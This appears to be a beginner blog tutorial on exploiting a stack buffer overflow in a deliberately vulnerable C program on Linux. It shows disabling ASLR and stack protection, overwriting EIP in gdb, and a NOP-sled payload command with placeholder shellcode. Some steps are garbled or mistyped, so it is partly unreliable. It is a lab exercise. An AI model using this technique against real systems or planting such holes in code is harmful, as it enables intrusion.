LINUX EXPLOIT - STACK OVERFLOW
before we start the exploitation of linux, we turn off ASRL with the type as shown below
cat /proc/sys/kernel/randomize_va_space --> to see if still alive
echo 0 > /proc/sys/kernel/randomize_va_space --> is to turn off ASRL
cat /proc/sys/kernel/randomize_va_space
// I am a vulnerable thing.
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]); // Vulnerable function!
return 0;
}
then save it with the extended fuzzer .c
gcc -ggdb -o (name after compile) (location file)
example
gcc -ggdb -o coba Desktop/ardy.c
and you type
gdb coba to open compile
gcc -ggdb -o coba -fno-stack-protector -mpreferred-stack-boundary=2 Desktop/ardy.c --> to turn off SSP by adding script -fno-stack-protector when it is compiled
after that open the gdb
gdb coba
Now we try to overwrite the EIP with the following command
run $(python -c 'print "\x41" * 505')
run $(python -c 'print "\x41" * 508')
info registers eip --> to see if the EIP is overwrite by 41414141
info registrasi
and you type
x/10x $esp - 40
x/10x $esp - 50
on break 8 means we put a break on line 8
after that type
run give me esp
info register esp
run show esp
info register esp
now we will compile the script than execute it followed by the command you wish it to execute.
with type ./sc_generator /bin/bas
before it is to simplify the manufacture of the shellcode download used to generate shellcode
run $(python 'print "\x90" * 323 + "(shellcode that had)" + "(EIP addresses that have been reduced)" * 35')
here 323 + 45 bytes of lenght = 368 bytes shellcode
after the last byte 508 - 368 bytes = 140 bytes
well now we divide 140 : 4 = 35.
4 that we get from \ X41 \ X41 \ X41 \ X41 These are calculated 4 byte
and when the enter key as we get the result below
Tidak ada komentar:
Posting Komentar